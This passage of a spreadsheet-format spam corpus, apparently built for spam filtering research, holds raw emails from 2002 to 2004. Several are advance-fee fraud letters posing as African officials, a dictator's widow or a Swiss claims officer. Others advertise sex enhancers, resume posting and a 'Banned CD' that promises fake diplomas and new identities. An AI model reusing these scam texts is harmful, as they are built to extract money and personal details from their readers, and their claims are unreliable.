will negatively affect us since we are still in active\nGovernment Service. \n\nAlso your area of specialization is not a hindrance to the successful\nexecution of this transaction.I have reposed my confidence in\nyou and hope that you will not disappoint us. \n\nKindly notify me for further details, upon your acceptance\nof this proposal. \n\nRegards, \n\nEngr.Makalele Johnson\n\n\n================================================== \nSingle?  Not for long.  Find your dream lover at \n\n[URL]http://www.wheresinglesmeet.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.wheresinglesmeet.com</t>
  </si>
  <si>
    <t>312</t>
  </si>
  <si>
    <t>To: adew1@mail3000.com\nFrom: adew1@mail3000.com\nDate: Thu, 07 Aug 2003 08:00:29 -0700</t>
  </si>
  <si>
    <t>Thu, 07 Aug 2003 08:00:29 -0700</t>
  </si>
  <si>
    <t>adew1@mail3000.com</t>
  </si>
  <si>
    <t>FROM: MR ADEMOLA WILLIAMS \nDEMOCRATIC REPUBLIC OF CONGO.\nREPLY TO EMAIL ADDRESS: awilliams44@k.ro\nDear Friend,\nSEEKING YOUR IMMEDIATE ASSISTANCE.\nPlease Permit me to make your acquaintance in so informal a manner. This is \nnecessitated by my urgent need to reach a dependable and trust wordy foreign\npartner. This request may seem strange and unsolicited but I will crave your \nindulgence and pray that you view it seriously. My name is MR Ademola Williams \nof the Democratic Republic of Congo and One of the close aides to the former \nPresident of the Democratic Republic of Congo LAURENT KABILA of blessed memory, \nmay his soul rest in peace.\nDue to the military campaign of LAURENT KABILA to force out the rebels in my \ncountry, I and some of my colleagues were instructed by Late President Kabila\nto  go abroad to purchase arms and ammunition worth of Twenty Million, Five \nHundred Thousand United States Dollars only (US$20,500,000.00) to fight the \nrebel group. But when President Kabila was killed in a bloody shoot-out by one \nof his aide a day before we were schedule to travel out of Congo, We \nimmediately decided to divert the fund into a private security company here in \nCongo for safe keeping. The security of the said amount is presently being \nthreatened here following the arrest and seizure of properties of Col. Rasheidi \nKaresava (One of the aides to Laurent Kabila) a tribesman, and some other \nMilitary Personnel from our same tribe, by the new President of the Democratic \nRepublic of Congo, the son of late President Laurent Kabila, Joseph Kabila.In \nview of this, we need a reliable and trustworthy foreign partner who can assist \nus to move this money out of my country as the beneficiary.\nWE have sufficient ''CONTACTS'' to move the fund under Diplomatic Cover to a \nsecurity company in the europe in your name. This is to ensure that the \nDiplomatic Baggage is marked ''CONFIDENTIAL'' and it  will not pass through \nnormal custom/airport screening and clearance.friends (western countries) who \nsuddenly became hostile to those of us who worked with the late President \nKabila, immediately after his son took office. Though we have neither seen nor \nmet each other, the information We gathered from an associate who has worked in \nyour country has encouraged and convinced us that with your sincere assistance, \nthis transaction will be properly handled with modesty and honesty to a huge \nsuccess within two weeks. The said money is a state fund and therefore requires \na total confidentiality.Thus, if you are willing to assist us move this fund \nout of Congo, you can contact me through my email address above with your \ntelephone, fax number and personal information to enable us discuss the \nmodalities and what will be your share (percentage) for assisting us.\nI must use this opportunity and medium to implore You to exercise the utmost \nindulgence to keep this Matter extraordinarily confidential, Whatever your \nDecision, while I await your prompt response. Thank you and GodBless.\n\nBest Regards\n\nMR WILLIAMS .\nNOTE:Respond using this box.\nawilliams44@k.ro\n\n\n\n\n\n-_-_-_ Free Email Service! No Hidden Charges! Click Below to Sign Up -_-_-\n         This mail sent through [URL]http://mail3000.com[/URL]\n\n</t>
  </si>
  <si>
    <t>448</t>
  </si>
  <si>
    <t>To: bluemariam@katamail.com\nFrom: nan\nDate: Thu, 06 Nov 2003 09:34:12 +0000</t>
  </si>
  <si>
    <t>Thu, 06 Nov 2003 09:34:12 +0000</t>
  </si>
  <si>
    <t>bluemariam@katamail.com</t>
  </si>
  <si>
    <t>"ATTN. QUICK SUPPORT"</t>
  </si>
  <si>
    <t>CONTACT ME THROUGH MY ATTORNEYS FAX; 234-1-7591936 OR EMAIL\n\nCompliments of the day to you!\n\nI am Mrs. Mariam Abacha widow of the late General Sanni Abacha\nformer Nigerian Military President who died on active Government\nservice on june 8, 1998.\n\nI got your contact from the Internet and I do believe you can\nhelp me.\n\nI am contacting you due to the present situation as regards the\nundemocratic manner the present administration in my country\n(Nigeria) is taking all that belongs to us You may be aware\nthat this is the usual attitude of leaders especially in Africa\nwhen there is a change of Government. The present Government of\nGeneral Olusegun Obasanjo is currently in a face off with my\nfamily in his bid to recover all our money because my Husband is\ndead.\n\nThey have brought up charges of corrupt enrichmemnt against us.\nUnfortunately, he is currently facing same from the National\nAssembly right now. I pray he does not get an Impeachment The\nlaw they made is yet another smear campaign aimed mainly to\nfrustrate, humiliate, dismember and widen the scope of hatred for\nmy family. A personal vendetta by President Obasanjo who was\njailed by my husband's Government for plotting a coup d 'etat\nagainst his administration in 1995.\n\n\nThis highly calculated attempt by this administration plus some\nWestern Banks through bi-lateral relationship has taken away from\nus a whopping amount in Switzerland and Bank accounts around the\nWorld. This rampaging of our Bank accounts abroad have yielded to\nthe barbaric pressure and just few months ago we were squized\nout of another US$395m because the accounts bear our names. This\nassertions can be ascertained independently if you wish to\nconfirm this from a leading newspaper in Nigeria (This Day Newspapers) from\ntheir website at [URL]www.thisdayonline.com[/URL] from the archives section in the\nMarch 10,2001, January 26,2002 and March 18, 2002 editions.\n\nThis pressure is taking a great toll on my family and all we ever\nowe. You may be aware that my surviving eldest son (Mohammed),\nwas undully detained without trial untill thursday 11TH of July\n2002 one year now that the Supreme Court of Nigeria Ordered his\nrelease and cleared him of any wrong doing as he has been\nlanguishing in prison for the past three and half years. It was on Monday\n23RD September last year that he was finally released to us.\n\nPlease we wish to solicit your cooperation as a foreigner to help\nus receive some family property / (Money) Deposited with a\nSecurity company which is our only hope / source of livelihood\nfor now. This is a call for you to help receive this money and\nput the money into good investments since we are barred from\nleaving the Country for now.\n\nAccording to my estimation in Western Europe and America alone we\nstill have over US$70M in cash with Security Companies that we\nintend to put in your care by getting a trusted foreigner to\nhandle money for the purpose of investment and safekeeping abroad.\n\nPlease Note that you will be expected to deal directly with the\nsecurity company with the information and LEGAL POWER we shall\ngive you to handle the entire transaction. There is demurrage\naccrued over time payable to Security Company to enable\ncollection of the Consignment, since the Deposit we made at the\ntime of Deposit has since expired. You must also know that CONSIGNMENT WAS\nDEPOSITED AS FAMILY TREASURES, ACTUAL CONTENT ON CONSIGNMENT WAS NOT DECLARED\nTO SECURITY COMPANY AT THE TIME OF DEPOSIT TO SAFE GUARD IT. If you can\ndo this, contact my ATTORNEY, BARRISTER ALI KOLOMA Fax; 234-1-7591936 as\nyou will be well REWARDED. This is however subject to our negotiation and\nagreement.\n\nYou can contact me ONLY via our family Attorney, Barrister Ali\nKoloma, BY email: palmgroovechambers@winningteam.com for security reason and further\n details.\n\nEndeavor to keep this highly confidential. In your response\ninclude your private telephone / fax numbers for easy\ncommunications with him.\n\nMy kind regards,\n\nMrs. Mariam Abacha\n(PLEASE REPLY ONLY TO; my Attorneys FAX NUMBER; 234-1-7591936, OR\n email;palmgroovechambers@winningteam.com)\n\nDISCLAIMER:This e-mail message and any attachments are\nconfidential and may be privileged or otherwise protected by\nlegal rules, and for use by the addressee only. If the message is\nreceived by anyone other than the addressee, please return the\nmessage to the sender and delete it and any attachments from your\ncomputer without copying it or disclosing its contents to anyone.\nWhilst all reasonable care has been taken to avoid the\ntransmission of viruses, no responsibility is accepted in this\nregard and the recipient should scan and carry out such other\nchecks as it considers appropriate.\n\n\n\n\n</t>
  </si>
  <si>
    <t>www.thisdayonline.com</t>
  </si>
  <si>
    <t>687</t>
  </si>
  <si>
    <t>To: R@E\nFrom: john paul &lt;john_paul@email.cz&gt;\nDate: Thu, 06 May 2004 20:03:51 -0800</t>
  </si>
  <si>
    <t>Thu, 06 May 2004 20:03:51 -0800</t>
  </si>
  <si>
    <t>john paul &lt;john_paul@email.cz&gt;</t>
  </si>
  <si>
    <t>R@E</t>
  </si>
  <si>
    <t>Dear</t>
  </si>
  <si>
    <t>My name is John paul, a member of Independent Committee of \nEminent Persons (ICEP), Switzerland. ICEP is charged with the responsibility \nof finding bank accounts in Switzerland belonging to non-Swiss \nindigenes, which have remained dormant since World War II. \n\nIt may interest you to know that in July of 1997, the Swiss Banker's \nAssociation published a list of dormant accounts originally opened by \nnon-Swiss citizens. These accounts had been dormant since the end of World \nWar II (May 9, 1945). Most belonged to Holocaust victims.\n\nThe continuing efforts of the Independent Committee of Eminent Persons \n(ICEP) have since resulted in the discovery of additional dormant \naccounts - 54,000 in December, 1999.\n\nThe published lists contain all types of dormant accounts, including \ninterest-bearing savings accounts, securities accounts, safe deposit \nboxes, custody accounts, and non-interest-bearing transaction accounts. \nNumbered accounts are also included. Interest is paid on accounts that \nwere interest bearing when established.\n\nThe Claims Resolution Tribunal (CRT) handles processing of all claims \non accounts due non-Swiss citizens. A dormant account of ORDNER ADELE \nwith a credit balance of 35,000,000 US dollar plus  accumulated interest \nwas discovered by me. The beneficiary was murdered during the holocaust \nera, leaving no WILL and no possible records for trace of heirs. \n\nThe Claims Resolution Tribunal has been mandated to report all \nunclaimed funds for permanent closure of accounts and transfer of existing \ncredit balance into the treasury of Switzerland government as provided by \nthe law for management of assets of deceased beneficiaries who died \ninterstate (living no wills).\n\nBeing a top executive at ICEP, I have all secret details and necessary \ncontacts for claim of the funds without any hitch. The funds will be \nbanked in the Cayman Island, being a tax free, safe haven for funds and \nwe can share the funds and use in investment of our choice.\n\nDue to the sensitive nature of my job, I need a foreigner to HELP claim \nthe funds. All that is required is for you to provide me with your \ndetails for processing of the necessary legal and administrative claim \ndocuments for transfer of the funds to you.\n\nKindly provide me with your full name, address, and telephone/fax. I \nwill pay all required fees to ensure that the fund is transferred to a \nsecure, numbered account in your name in the Cayman Island, of which you \nwill be capable of accessing the funds gradually and transferring to \nyour country and other banks of choice in the world. My share will be 60 \npercent and your share is 40 per cent of the total amount. THERE IS NO \nRISK INVOLVED.\n\nYou can find additional information about unclaimed funds through the \ninternet at the following websites:\n\n[URL]www.swissbankclaims.com[/URL]\n\n[URL]http://www.cnn.com[/URL]\n\n\n[URL]www.avotaynu.com[/URL]\n\n[URL]www.icheic.org[/URL]\n\n[URL]www.livingheirs.com[/URL]\n\n[URL]www.wiesenthal.com[/URL]\n\n\nThe Holocaust Claims Processing Office has put funds in Escrow awaiting \nsubmission of valid claims for necessary disbursement.\n\nI find myself priviledged to have this information and this may be a \ngreat opportunity for a life time of success without risks.\n\nDue to security reasons, reply to my via email only. You may reply to \nme securely on the following email,\njohnson1313@sify.com\nThank you for your prompt response.\n\nJohn\n\n\n</t>
  </si>
  <si>
    <t>5112</t>
  </si>
  <si>
    <t>To: &lt;jessicabrod@hotmail.com&gt;, &lt;yyyyadden444@aol.com&gt;, &lt;johno@innet.com&gt;,\nFrom: dermitage@hotmail.com\nDate: Thu, 06 Jun 2002 16:01:58 -1600</t>
  </si>
  <si>
    <t>Thu, 06 Jun 2002 16:01:58 -1600</t>
  </si>
  <si>
    <t>dermitage@hotmail.com</t>
  </si>
  <si>
    <t>&lt;jessicabrod@hotmail.com&gt;, &lt;yyyyadden444@aol.com&gt;, &lt;johno@innet.com&gt;,</t>
  </si>
  <si>
    <t>Men &amp; Women, Spruce up your sex life!                EWFXV</t>
  </si>
  <si>
    <t>\n\n| **Vigoral Herbal Sex Enhancers**  \n **Direct from the lab to you!**  \n **We are Now Offering 3 Unique Products to help increase your moments w= ith\nthat special someone @ Only $24.99 each!!!** |\n![](3D"[URL]http://www.thezs.com[/URL]  \n---|---  \n  \n![](3D"[URL]http://www.thezs.com[/URL]") |\n![](3D"[URL]http://www.thezs.com[/URL]") |\n![](3D"[URL]http://www.thezs.com[/URL]")  \n---|---|---  \n![](3D"[URL]http://www.thezs.com[/URL]")  \n**Only $24.99 ea!** | ![](3D"[URL]http://www.thezs.com[/URL]")  \n**Only $24.99 ea!** | ![](3D"[URL]http://www.thezs.com[/URL]")  \n**Only $24.99 ea!**  \nM= en, Increase Your Energy Level &amp; Maintain Stronger Erections! | E= dible,\nSpecially Formulated Lubricant For Everyone! | W= omen, Heighten Your Sexual\nDesire &amp; Increase Your Sexual Climax!  \n  \n**CLICK HERE to Get it While it's HOT!**  \n---  \n  \nYou are receiving this special offer because you have provided permiss= ion to\nreceive email communications regarding special online promotions o= r offers.\nIf you feel you have received this message in error, or wi= sh to be removed\nfrom our subscriber list, Click HERE and you will be removed within less than\nthree business d= ays. Thank You and sorry for any inconvenience.  \n---\n\n</t>
  </si>
  <si>
    <t>http://www.thezs.com http://www.thezs.com http://www.thezs.com http://www.thezs.com http://www.thezs.com http://www.thezs.com http://www.thezs.com</t>
  </si>
  <si>
    <t>5099</t>
  </si>
  <si>
    <t>To: yyyy-cv@spamassassin.taint.org\nFrom: Daniel Johnson &lt;djohnson@allexecs.com&gt;\nDate: Thu, 06 Jun 2002 13:18:35 +0800</t>
  </si>
  <si>
    <t>Thu, 06 Jun 2002 13:18:35 +0800</t>
  </si>
  <si>
    <t>Daniel Johnson &lt;djohnson@allexecs.com&gt;</t>
  </si>
  <si>
    <t>Found your resume . . . . .</t>
  </si>
  <si>
    <t>===========================================================\n\n                  PROVEN WAY TO GET A JOB!\n\n===========================================================\n\nLOS ANGELES - April 22, 2002 - One simple form gets your resume\non 75 career sites like Monster, HotJobs, Job.com, Dice &amp; more.\nIn about 15 minutes your resume can be seen by 1.5 million\nemployers and recruiters daily.\n\nTry it now at [URL]http://start.resumerabbit.com[/URL]\n\n============================================================\n\n           POST YOUR RESUME TO MULTIPLE CAREER SITES\n\n============================================================\n\nIn today's job market it's important to get your resume in\nfront of as many hiring managers as possible.  A new service\nat [URL]http://start.resumerabbit.com[/URL] will instantly post your resume\nto Monster.com, Job.com, Headhunter.net, Dice and other top\njobs sites, searched by millions of hiring managers daily.\n\nResumeRabbit's one-stop form takes about 15 minutes and will\nsave you over 60 hours of research and data entry.\n\nOnce posted, your resume will be seen by the 1.5 million\nemployers and recruiters that search all the career sites every\nday. To post your resume on 75 career sites go to:\n[URL]http://start.resumerabbit.com[/URL]\n\n============================================================\n\n                  WHAT JOB SEEKERS HAVE TO SAY\n\n============================================================\n\n"I got the account on Sunday evening and by Monday morning I\nwas already getting phone calls from recruiters. That was fast\nnd easy. There are so many job sites out there it would have\ntaken weeks. Thanks."\n\n     Ronnie R, a Sales Representative\n\n"WOW! What a Service!  I signed up on a Tuesday, and by Thursday\nthe job offers started pouring in. By Friday, I had a job set up!\nThis is the Best investment I have ever made! THANKS!\n\n     James M, Technical Support Specialist\n\n============================================================\n\n                  QUICK &amp; EASY. TRY IT NOW!\n\n============================================================\n\nIt's a tough job market right now. To succeed, you need to play\nthe numbers.  Get maximum exposure now.  Just fill out one easy\nform and be instantly posted to over 75 career sites. Just go to\n[URL]http://start.resumerabbit.com[/URL]\n\n============================================================\n\nThe staff of All-Execs.com have years of recruiting experience\nand may from time to time send you a review of different career\ntools that have helped others in their job search.  If you'd\nrather not receive these reviews, reply to this note with\n"Remove" in the subject line.\n\nSincerely,\n\nDan Johnson\ndjohnson@allexecs.com</t>
  </si>
  <si>
    <t>http://start.resumerabbit.com http://start.resumerabbit.com http://start.resumerabbit.com http://start.resumerabbit.com</t>
  </si>
  <si>
    <t>5106</t>
  </si>
  <si>
    <t>To: &lt;urgent@dogma.slashnull.org&gt;\nFrom: makemoneyathome@btamail.net.cn\nDate: Thu, 06 Jun 2002 06:09:05 -1600</t>
  </si>
  <si>
    <t>Thu, 06 Jun 2002 06:09:05 -1600</t>
  </si>
  <si>
    <t>makemoneyathome@btamail.net.cn</t>
  </si>
  <si>
    <t>&lt;urgent@dogma.slashnull.org&gt;</t>
  </si>
  <si>
    <t>BANNED CD! BANNED CD!</t>
  </si>
  <si>
    <t>**********************************banned cd***********************************************\n*******************************June 5 2002************************************************\n\n\nI have been receiving emails saying that I'm contributing to the "moral decay of society" by selling the Banned CD.  That may be, but I feel strongly that you have a right to benefit from \nthis hard-to-find information. \nSo I am giving you ONE LAST CHANCE to order the Banned CD! \nWith this powerful CD, you will be able to investigate your friends, enemies and lovers in just minutes using the Internet.  You can track down old flames from college, or you can dig up some dirt on your boss to make sure you get that next promotion! \n  \nOr maybe you want a fake diploma to hang on your bedroom wall.  You'll find addresses for companies that make these diplomas on the Banned CD. \nNeed to disappear fast and never look back?  No problem! \nUsing the Banned CD, you will learn how to build a completely \nnew identity. \nObviously, the Powers That Be don't want you to have the Banned CD.  They have threatened me with lawsuits, fines, and even imprisonment unless I stop selling it immediately. But I feel that YOU have a Constitutional right to access this type of information, and I can't be intimidated. \n\n Uncle Sam and your creditors are horrified that I am still selling this99exit\nAnd you can't buy freedom at your local Walmart.  You will dg43000sdasdfasdffgdfhyutdfsgttttrsdg\nhave the freedom to avoid creditors, judgments, lawsuits, IRS \ntax collectors, criminal indictments, your greedy ex-wife or \nex-husband, and MUCH more!\nPlease Click the URL for the Detail! \n[URL]http://%62%61nn%65%64%63d.net[/URL]\nYou are receiving this special offer because you have provided permission to receive third party email communications regarding special online promotions or offers. We strongly oppose the use of SPAM email and do not want to send our mailings to anyone who does not wish to receive them. If you do not wish to receive any further messages from Travel Easy. To Be Removed From Our List, \n[URL]http://%62%61nn%65%64%63d.net[/URL]</t>
  </si>
  <si>
    <t>http://%62%61nn%65%64%63d.net http://%62%61nn%65%64%63d.net</t>
  </si>
  <si>
    <t>5101</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: Web Deals &lt;webdeals@7a6a.net&gt;\nDate: Thu, 06 Jun 2002 01:38:14 Eastern Daylight Time</t>
  </si>
  <si>
    <t>Thu, 06 Jun 2002 01:38:14 Eastern Daylight Time</t>
  </si>
  <si>
    <t>Web Deals &lt;webdeals@7a6a.net&gt;</t>
  </si>
  <si>
    <t>Get The BEST PRICE on Your Next CAR!</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n&gt; *